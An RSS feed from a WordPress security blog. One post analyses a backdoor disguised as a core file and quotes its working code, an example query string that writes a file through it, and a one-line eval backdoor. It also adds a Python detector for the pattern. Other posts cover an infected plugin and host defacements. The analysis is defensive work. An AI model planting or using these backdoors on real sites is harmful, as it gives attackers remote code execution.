<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" version="2.0">

<channel>
	<title>Smackdown!</title>
	
	<link>http://smackdown.blogsblogsblogs.com</link>
	<description>Smackdown!</description>
	<lastBuildDate>Thu, 25 Apr 2013 19:39:52 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/mvandemar-smackdown" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="mvandemar-smackdown" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>New WordPress Backdoor Style Discovered – Hackers Think They Are Sneaky</title>
		<link>http://smackdown.blogsblogsblogs.com/2013/04/25/new-wordpress-backdoor-style-discovered-hackers-think-they-are-sneaky/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2013/04/25/new-wordpress-backdoor-style-discovered-hackers-think-they-are-sneaky/#comments</comments>
		<pubDate>Thu, 25 Apr 2013 19:39:52 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[coding]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1198</guid>
		<description><![CDATA[I was cleaning a client&#8217;s site today that had been hacked, when I discovered a new backdoor implementation that I had never seen before. This one is a perfect example of why automated scans are often not sufficient when cleaning up a hacked WordPress installation. You can see the full file here: 99bde887d.php. The file [...]]]></description>
				<content:encoded><![CDATA[<p>I was cleaning a client&#8217;s site today that had been hacked, when I discovered a new backdoor implementation that I had never seen before. This one is a perfect example of why automated scans are often not sufficient when cleaning up a <a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/">hacked WordPress</a> installation. You can see the full file here: <a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/99bde887d.phps" target="_blank">99bde887d.php</a>.</p>
<p>The file was dropped into the theme that the client is using, and is coded to mimic a core WordPress file, using some of the same function names and coding conventions that WordPress itself uses. It is designed so that most people opening it and actually looking at the code would still not notice that it was anything malicious. I have seen enough back doors though that even creative ones will often stand out to me. It is definitely not something that would be picked up with any of the existing scripted scans out there. While of course someone can update their plugins or scripts to include specific strings to look for that this file contains,<span id="more-1198"></span> the exact variable names and other text in the file could be modified easily enough, even in an automated per-hack basis, so that while the updated scripts would find any instances of <em>this</em> backdoor that I found, they would miss any and all variations of it.</p>
<p>The relevant bits of the code include lines 14 &#038; 15, 47 &#038; 48, and 71 through 77. The rest of the code is misdirection, placed there to cover the tracks of those 11 lines. Lines 14 &#038; 15 look like such:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>14
15
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> <span style="color: #990000;">empty</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #990000;">defined</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DOING_AJAX'</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">||</span> <span style="color: #990000;">defined</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DOING_CRON'</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#41;</span>
	<span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>

<p>Since this file is not using include() or require() to tie into any of the core WordPress files, neither defined(&#8216;DOING_AJAX&#8217;) nor defined(&#8216;DOING_CRON&#8217;) will ever return &#8220;true&#8221;, so the only actual check here is to see if there are any POST parameters being passed in. If so, continue on, and if not then simply die() (halt execution of the script). Lines 16 through 46 set a constant that never gets used, a function that never gets called, and an if statement that always returns false (but is set to look like it is supposed to load WordPress). The next bit of code that actually does anything is lines 47 &#038; 48:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>47
48
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900; font-weight: bold;">false</span> <span style="color: #339933;">===</span> <span style="color: #000088;">$crons</span> <span style="color: #339933;">=</span> _get_cron_array<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#41;</span>
	<span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>

<p>While this statement may appear to be innocuous enough, what it actually does is set a dummy variable to the output of a function, and if that result is false, die(). The sneaky bit is that by setting the variable it actually causes the function to process, and since the function doesn&#8217;t return a value the if statement always evaluates to false. Thus the entire active bits of the script are: check if there are POST parameters, and if so, call this one function, and then end the script.</p>
<p>The function in question, which in this script is named _get_cron_array() and shares the same name as a core WordPress function (but could in fact be named anything), is on lines 71 through 77:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>71
72
73
74
75
76
77
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">function</span> _get_cron_array<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span>
<span style="color: #009900;">&#123;</span>
	<span style="color: #000088;">$info</span> <span style="color: #339933;">=</span> <span style="color: #990000;">array_merge</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_REQUEST</span><span style="color: #339933;">,</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> <span style="color: #339933;">!</span><span style="color: #990000;">isset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$info</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'lng'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#41;</span> <span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span> <span style="color: #0000ff;">'Restricted access'</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">else</span> <span style="color: #000088;">$info</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'feed'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$info</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">,</span> <span style="color: #000088;">$info</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'link'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'&quot;'</span><span style="color: #339933;">.</span>
	<span style="color: #000088;">$info</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'lng'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'&quot;'</span><span style="color: #339933;">.</span><span style="color: #000088;">$info</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'title'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">,</span> <span style="color: #000088;">$info</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></td></tr></table></div>

<p>What this does is merge all of the REQUEST variables (e.g. POST and GET) with the COOKIE variables into a single array named $info, and check for the existence of one named &#8220;lng&#8221;. If it doesn&#8217;t exist then just stop there, but if it does then treat one named &#8220;feed&#8221; as a function, with ones named &#8220;file&#8221;, &#8220;link&#8221;, &#8220;lng&#8221;, &#8220;title&#8221;, and assuming &#8220;file&#8221; is an array, the second element of &#8220;file&#8221;, all as parameters that are passed into that function. The upshot of this is that they can pass in <em>any php function whatsoever</em> in the parameter named &#8220;feed&#8221;, and the script will execute it on the server. For example, if the following query string were passed into this script:</p>
<p>feed=file_put_contents&#038;file=t0ast.php&#038;link=&lt;?php%20echo%20&#038;lng=success&#038;title=;%20?&gt;</p>
<p>It would then create a script on the server named t0ast.php, with the following contents:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> <span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;success&quot;</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>Of course, I am sure what the hackers passed in was not quite as harmless as this example. This script is a variation of the shortest backdoor that I have ever encountered, which I still see in use occasionally at the top of sites that have been hit:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> <span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'asc'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>That code does essentially the same thing, allowing arbitrary php code to be executed on the server (ie. it is an RCE, or Remote Code Execution, exploit). The shorter code, however, is easily detected, even with variations. This new script, however, is not. This is why I strongly advocate a complete rebuild of your site if you happen to get hit by hackers, since there are so many ways to hide malicious code in the WordPress framework. By deleting the entire installation and replacing all of the core files and plugins with fresh copies, retaining only the theme and uploads folders, it greatly reduces the amount of code that needs to be examined by hand, which makes it much easier to find stuff like what I outlined here.</p>
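<p>An added example, not code from the original post or from WordPress: a Python heuristic that flags PHP by structure rather than by fixed strings, reporting any call whose callee is a variable derived from request input, so renaming the variables or the wrapper function does not hide it. The function names and the renamed and benign samples are constructed for illustration, and the scan works on raw text without parsing comments or string literals.</p>

```python
import re
from pathlib import Path

# PHP superglobals that carry attacker-controllable request data.
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "_FILES", "_SERVER"}

# $name = expr;  or  $name['k'] .= expr;  (expression runs to the next semicolon)
ASSIGN = re.compile(r"\$(\w+)(?:\s*\[[^\]]*\])*\s*[.+]?=(?!=)\s*([^;]*);")
# $name(...)  or  $name['k'][0](...) : a call whose callee is a variable
DYNAMIC_CALL = re.compile(r"\$(\w+)((?:\s*\[[^\]]*\])*)\s*\(")
# Constructs/functions whose first argument is run as code or as a callable.
CODE_SINK = re.compile(
    r"\b(eval|assert|call_user_func(?:_array)?)\s*\(([^;]*)", re.I)
VARIABLE = re.compile(r"\$(\w+)")


def tainted_variables(php):
    """Names of variables that (transitively) receive request data."""
    tainted = set(SUPERGLOBALS)
    changed = True
    while changed:  # repeat until no new variable becomes tainted
        changed = False
        for name, expr in ASSIGN.findall(php):
            if name not in tainted and tainted.intersection(VARIABLE.findall(expr)):
                tainted.add(name)
                changed = True
    return tainted


def find_request_driven_calls(php):
    """Return (line, kind, detail) for calls controlled by request input."""
    tainted = tainted_variables(php)
    findings = []
    for lineno, line in enumerate(php.splitlines(), start=1):
        for m in DYNAMIC_CALL.finditer(line):
            if m.group(1) in tainted:
                findings.append((lineno, "dynamic-call", m.group(0).rstrip("( ")))
        for m in CODE_SINK.finditer(line):
            first_arg = m.group(2).split(",")[0]
            if tainted.intersection(VARIABLE.findall(first_arg)):
                findings.append((lineno, "code-sink", m.group(1).lower()))
    return findings


def scan_tree(root):
    """Scan every .php file under root; returns {path: findings} for hits only."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_request_driven_calls(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# The function quoted in the post (lines 71-77 of the dropped file).
PAGE_SAMPLE = """function _get_cron_array()
{
    $info = array_merge($_REQUEST,$_COOKIE);
    if ( !isset($info['lng']) ) die( 'Restricted access' );
    else $info['feed']($info['file'], $info['link'].'"'.
    $info['lng'].'"'.$info['title'], $info['file'][1]);
}
"""

# Constructed variant: every name changed and one extra assignment hop added.
RENAMED_SAMPLE = """$opts = array_merge($_REQUEST, $_COOKIE);
$cfg = $opts;
if (!isset($cfg['v'])) exit;
$cfg['cb']($cfg['a'], $cfg['b']);
"""

# The short backdoor the post compares against.
SHORT_SAMPLE = "eval($_POST['asc']);"

# Constructed benign code: request data is read, and a variable function is
# called, but the callee is a fixed string rather than request input.
BENIGN_SAMPLE = """$page = isset($_GET['page']) ? intval($_GET['page']) : 1;
$handler = 'my_theme_init';
$handler();
echo esc_html(sanitize_text_field($_POST['title']));
"""

if __name__ == "__main__":
    for label, sample in [("page", PAGE_SAMPLE), ("renamed", RENAMED_SAMPLE),
                          ("short", SHORT_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(label, find_request_driven_calls(sample))
```

<p>Run <code>scan_tree()</code> over the theme and uploads folders that survive a rebuild; every hit still needs reading by hand, since legitimate code can also call variables as functions.</p>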
<p>If you have been hit, and you are not comfortable following my <a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/">WordPress cleaning guide</a> yourself, I am available for hire. Simply fill out <a href="http://smackdown.blogsblogsblogs.com/contact-michael-vandemar/">my contact form</a> letting me know the details of what is going on, and I will get back to you as soon as possible. </p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2013/04/25/new-wordpress-backdoor-style-discovered-hackers-think-they-are-sneaky/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Warning: WordPress.org Does Not Tell You If You Download An Infected Plugin From Them</title>
		<link>http://smackdown.blogsblogsblogs.com/2013/04/10/warning-wordpress-org-does-not-tell-you-if-you-download-an-infected-plugin-from-them/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2013/04/10/warning-wordpress-org-does-not-tell-you-if-you-download-an-infected-plugin-from-them/#comments</comments>
		<pubDate>Wed, 10 Apr 2013 13:00:19 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1173</guid>
		<description><![CDATA[Have you ever logged in to your WordPress dashboard, noticed that there were some updates pending, but simply couldn&#8217;t be bothered pushing the button to run them? Sure you have. Who hasn&#8217;t? A good majority of my work comes from dehacking websites that have been compromised, and even I slack on that from time to [...]]]></description>
				<content:encoded><![CDATA[<p>Have you ever logged in to your WordPress dashboard, noticed that there were some updates pending, but simply couldn&#8217;t be bothered pushing the button to run them? Sure you have. Who hasn&#8217;t? A good majority of my work comes from dehacking websites that have been compromised, and even I slack on that from time to time. I mean, if there are no security bulletins about the updates, and I am only using plugins I have downloaded directly from WordPress.org I should be fine, right?</p>
<p><strong>Wrong.</strong></p>
<p>The day before yesterday I rebuilt a client&#8217;s site that had been hacked, grabbing fresh versions of all of the plugins he was using. I noticed that one of the plugins, <a href="http://wordpress.org/extend/plugins/social-media-widget/" target="_blank">Social Media Widget</a>, didn&#8217;t download though, and when I went to investigate why<span id="more-1173"></span> I saw that it had been yanked from the WordPress repositories. Checking Google&#8217;s cache I could tell that it had only recently been removed, that the old download button still worked, and there were no warnings or messages as to why it was pulled anywhere I looked. I went ahead and grabbed a fresh copy, then posted on the support forums (which also gave no clues as to why it was gone) asking what was up with it:</p>
<p><a href="http://wordpress.org/support/topic/anyone-know-why-social-media-widget-was-removed" target="_blank">http://wordpress.org/support/topic/anyone-know-why-social-media-widget-was-removed</a></p>
<p>A few hours later I got my answer: the plugin was infected with malware, so they had removed the plugin page altogether. According to <a href="https://twitter.com/Otto42" target="_blank">Samuel Wood (Otto)</a>, one of the WordPress devs, they &#8220;forced an update&#8221; of the plugin to a version that they fixed:</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/we-forced-an-update.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/we-forced-an-update.png" alt="we-forced-an-update" width="650" height="85" class="aligncenter size-full wp-image-1174" /></a></p>
<p>&nbsp;</p>
<p>Two things struck me as wrong about this. First, WordPress cannot &#8220;force&#8221; an update of a plugin to the users themselves, so Otto&#8217;s claim was misleading at best. They can only update the svn, which then lets the user know that there is an update available (assuming that they log in to their dashboard of course). If the users do not see the update, or do not have reason to believe that there is an urgent reason to run it, then it will remain on their installations until they do. To give you an idea of how ineffectual that tactic is, if one relies solely on that for protecting the infected blogs, here is a screenshot of the distribution of the various active versions of the plugin from back on March 28th:</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/social-media-widget-stats-page.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/social-media-widget-stats-page.png" alt="social-media-widget-stats-page" width="562" height="332" class="aligncenter size-full wp-image-1189" /></a></p>
<p>&nbsp;</p>
<p>This shows that less than 10% of the almost 1 million users had upgraded to the most recent version of the plugin, which had been out for a month when this data was collected.</p>
<p>Second, why is it that until I actually posted this question, no word about this infected plugin was mentioned by WordPress? There was nothing on the WordPress.org blog, nothing on Twitter from any of the developers, nothing on <a href="http://wordpress.org/support/plugin/social-media-widget" target="_blank">the plugin&#8217;s support forum</a>, and of course, aside from letting me know that there was an update, nothing in the WordPress dashboard, <strong>not even when I clicked on the &#8220;View version 4.0.1 details&#8221; link in my plugins screen</strong>:</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/social-media-widget-update-available.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/social-media-widget-update-available.png" alt="social-media-widget-update-available" width="713" height="98" class="aligncenter size-full wp-image-1176" /></a></p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/social-media-widget-4.0.1-changelog.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/social-media-widget-4.0.1-changelog.png" alt="social-media-widget-4.0.1-changelog" width="644" height="402" class="aligncenter size-full wp-image-1175" /></a></p>
<p>&nbsp;</p>
<p>In fact, the only place you will see any information related to this malware is if you run the update, navigate to the folder for the plugin, open the readme.txt in there, and scroll down to line 181:</p>
<pre>== Changelog ==

= 4.0.1 =

* Remove potentially malicious code.</pre>
<p>And that&#8217;s the extent of what WordPress feels is necessary to warn its users that there was an exploited plugin that was distributed from the official plugin repositories. This isn&#8217;t one of those obscure, rarely used plugins, either. Before being yanked this plugin had been downloaded 940,776 times. Currently the remote file that was being included in the plugin merely contained some spam, and associated JavaScript to hide the spam from normal view, but since the remote file itself is under control of someone who obviously is not brimming over with moral fortitude there is nothing saying that they couldn&#8217;t decide just as easily to swap the file out for something that spreads viruses. In such a case that would mean that everyone still unaware that they are hosting an infected plugin would suddenly be serving viruses to their audience. If you ask me the fact that there is a chance that could happen should be enough to put out a tad bit more of an alert than a single line in a readme.txt that the majority of people will never read. WordPress, however, doesn&#8217;t seem to feel that way.</p>
<p>Even more disconcerting is what I found out a little bit after that. Once I got my answer in the thread I opened, Sucuri <a href="http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html" target="_blank">blogged about it</a>, and Samuel left a few comments there as well, where he used the phrase &#8220;Normally in these cases&#8221; when referring to this incident:</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/we-normally-hide-infected-plugin-indcidents.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2013/04/we-normally-hide-infected-plugin-indcidents.png" alt="we-normally-hide-infected-plugin-indcidents" width="680" height="402" class="aligncenter size-full wp-image-1181" /></a></p>
<p>This tells me that, regardless of how rare it happens, it appears to be WordPress&#8217;s policy that when an infected or compromised plugin makes its way into the repositories they quietly clean it up without any fanfare. Often times, unfortunately, this would be like closing the proverbial barn door after the horses got out, and stronger measures may be necessary (up to and including <a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/" target="_blank">rebuilding the whole installation</a> in some cases). The WordPress plugin repositories are supposed to be a trusted source. Not being more forthcoming when something like this happens borders on negligence, to put it bluntly.</p>
<p>I understand that in years past WordPress had quite the reputation as being a security risk, and that there is a certain amount of bad press associated with being upfront about incidents such as this. However, I hope that WordPress will eventually decide that potential public safety risks outweigh not wanting to look bad, will do the right thing, and will change their policies about publicly letting people know when these things happen.</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2013/04/10/warning-wordpress-org-does-not-tell-you-if-you-download-an-infected-plugin-from-them/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Hosting with HostPapa or Netregistry and Hacked? Switch Hosts Now. (hacked by hacker)</title>
		<link>http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/#comments</comments>
		<pubDate>Thu, 15 Nov 2012 00:21:35 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[customer service]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1141</guid>
		<description><![CDATA[It looks like another pair of hosts have joined GoDaddy in the &#8220;Not our fault&#8221; game when their servers get breached. Yesterday I had a few people contact me whose sites had been hacked, all with the identical symptoms: the only thing showing on their sites are the words hacked by hacker in plain text, [...]]]></description>
				<content:encoded><![CDATA[<p>It looks like another pair of hosts have joined <a href="http://smackdown.blogsblogsblogs.com/2010/05/13/hosting-with-godaddy-might-want-to-rethink-that-decision/" target="_blank">GoDaddy</a> in the &#8220;Not our fault&#8221; game when their servers get breached. Yesterday I had a few people contact me whose sites had been hacked, all with the identical symptoms: the only thing showing on their sites are the words <strong>hacked by hacker</strong> in plain text, on a white background. The one thing they all had in common is that they were hosting with either <a href="https://twitter.com/HostPapa" target="_blank">HostPapa</a> or <a href="https://twitter.com/netregistry" target="_blank">Netregistry</a>, and the one thing that both hosts had in common is that they refused to own up to the problem:</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/netregistry-says-not-their-fault.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/netregistry-says-not-their-fault.png" alt="" title="Netregistry says not their fault" width="538" height="277" class="aligncenter size-full wp-image-1142" /></a></p>
<p>&nbsp;</p>
<p>and in HostPapa&#8217;s case they are even trying to blame it on WordPress:</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/hostpapa-says-its-wordpress.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/hostpapa-says-its-wordpress.png" alt="" title="HostPapa says its wordpress" width="535" height="279" class="aligncenter size-full wp-image-1143" /></a></p>
<p>&nbsp;</p>
<p>Isn&#8217;t it nice the way they are able to determine that it is a WordPress issue, without even knowing which site it is? These styles of hacks, which usually have a specific hacker&#8217;s tag or signature rather than just &#8220;hacker&#8221;, often indicate to me that something other than a standard scripting exploit is at play. Whenever I see a site hit with a similar defacing hack, the first thing I do is check to see if there are other sites affected on the same host. </p>
<p><em>Warning: I am on Linux, which is unaffected by viruses that can affect Windows users. Unless you are on Linux or a Mac you should exercise extreme caution when looking for hacked sites, even if you have up to date antivirus software installed.</em> </p>
<p>The way I check is I ping the infected domain in order to get the IP address, which in this case was srv03.netregistry.net (180.235.128.204), which I then plug into Bing using their &#8220;ip:&#8221; advanced search option (search by IP), plus the phrase &#8220;powered by WordPress&#8221;:</p>
<p><a href="http://www.bing.com/search?q=ip%3A180.235.128.204+%2B%22powered+by+Wordpress%22" target="_blank">http://www.bing.com/search?q=ip%3A180.235.128.204+%2B%22powered+by+Wordpress%22</a></p>
<p>Clicking through those results I could easily see that this was far from isolated, and by using Bing&#8217;s cache I was able to determine that many of these sites were in fact up to date running the latest WordPress version before getting hit. I then tried several other of their servers (srv01.netregistry.net, srv02.netregistry.net, and srv04.netregistry.net), all with the same result. I sent them a tweet <a href="https://twitter.com/mvandemar/status/268584674987753472" target="_blank">letting them know</a> that they appeared to have an issue, and they replied, as shown in the screenshot above, that they were able to &#8220;confirm there&#8217;s been no server security breaches&#8221;. I then gave them examples of 15 identical hacks across 4 different servers of theirs <a href="https://twitter.com/mvandemar/status/268593046306820096" target="_blank">here</a>, <a href="https://twitter.com/mvandemar/status/268593684533092352" target="_blank">here</a>, <a href="https://twitter.com/mvandemar/status/268594924264513536" target="_blank">here</a>, and <a href="https://twitter.com/mvandemar/status/268596096392126464" target="_blank">here</a>. As of yet they have not bothered to reply to those tweets.</p>
<p>While I was in the midst of investigating Netregistry, someone else contacted me with the exact same hack, only their site was hosted with HostPapa. Going through the same process (as well as checking with recent forum posts from people with these symptoms) I checked hp82.hostpapa.com (76.74.128.200), hp78.hostpapa.com (76.74.128.160), and hp86.hostpapa.com (76.74.242.140), and found the same issues with all of them. Regardless of the evidence, however, HostPapa is still insisting that this is a WordPress issue:</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/hostpapa-still-says-its-wordpress.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/hostpapa-still-says-its-wordpress.png" alt="" title="HostPapa still says it&#039;s WordPress" width="539" height="334" class="aligncenter size-full wp-image-1146" /></a></p>
<p>&nbsp;</p>
<p>There are a few issues with them trying to blame this on WordPress. First off, if this were an issue affecting WordPress installations that were up to date with the latest (which is 3.4.2, which quite a few of these sites were running), then it would be much, much more widespread, and it would not be isolated to just these two hosts. Secondly, if this were a WordPress issue then why was I able to find at least 1 Joomla site on HostPapa with the exact same hack?</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/not-wordpress-issue-sm.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/11/not-wordpress-issue-sm.png" alt="" title="Not a WordPress issue" width="500" height="335" class="aligncenter size-full wp-image-1147" /></a></p>
<p>&nbsp;</p>
<p>I let HostPapa know this <a href="https://twitter.com/mvandemar/status/268832592386748416" target="_blank">via a tweet</a>, but they were uninterested in addressing that. Instead they seem more intent on blaming it on WordPress, telling their clients that they don&#8217;t help with hacking issues, and pretending that everything is fine. Just because a slew of sites that get hacked on a server are all running WordPress does not make it a WordPress issue. WordPress is a database driven platform, and is the most popular one out there. If a hacker locates a MySQL based exploit on a given host then the fastest ways to find a large number of sites to target would be to do searches similar to the ones I did above and aim for the WordPress ones. I am guessing this is actually what happened here, and it is obvious that this isn&#8217;t some 0-Day WordPress exploit (like both HostPapa and <a href="http://www.atmayogi.com/2012/11/wordpress-vulnerability-hacked-by-hacker/" rel="nofollow" target="_blank">this idiot here</a> are trying to claim).</p>
<p>Regardless of whether or not they eventually own up to it, if you are one of the unfortunates who happens to be hosting with either of these companies I would highly recommend you switch hosting, even if you are not one of the ones that got hacked. Again, I always recommend <a href="http://www.jdoqocy.com/nd115shqnhp48779B7A465965D68" target="_blank">Hostgator</a>, both for their security and for the fact that they happen to have better performing servers than many of the other hosts out there. </p>
<p>If you did get hit and you just want to get back up and running as fast as possible, luckily with the instances I saw this isn&#8217;t actually too difficult. While the next wave of hackers who come through might do more damage, at this point it seems to simply be a matter of replacing your root index.php with a fresh one from a clean WordPress install, and replacing either your index.php or header.php (or both) inside your theme using backups or clean downloads (assuming you have a readily downloadable copy of the theme you are using). I also saw some instances of people being unable to log in to the WordPress admin interface. The solution to that, as I <a href="http://wordpress.org/support/topic/hacked-by-hacker-2" target="_blank">described here</a>, is to go into your database through phpMyAdmin in cPanel and look at the wp_users table. If they switched the admin username and email, edit the record to switch it back and then go through the Lost Password function on the WP login page. </p>
<p>One thing to be careful of is that oftentimes in cases like these the hackers will drop back doors on the sites, so that even once the host fixes the initial issue the hackers can just get right back in again later. If anyone has any issues where they keep getting hacked, even after moving to a new host, I am available to do professional cleanings. Feel free to <a href="http://smackdown.blogsblogsblogs.com/contact-michael-vandemar/">contact me</a> for more information. Also, <a href="http://www.jdoqocy.com/nd115shqnhp48779B7A465965D68" target="_blank">Hostgator</a> does offer free migrations in some instances, but if you have multiple or complex sites that you would like migrated to them I can assist with that as well (or to another host if you prefer, of course).</p>
<p>More resources:</p>
<p><a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/">How To Clean Hacked WordPress</a><br />
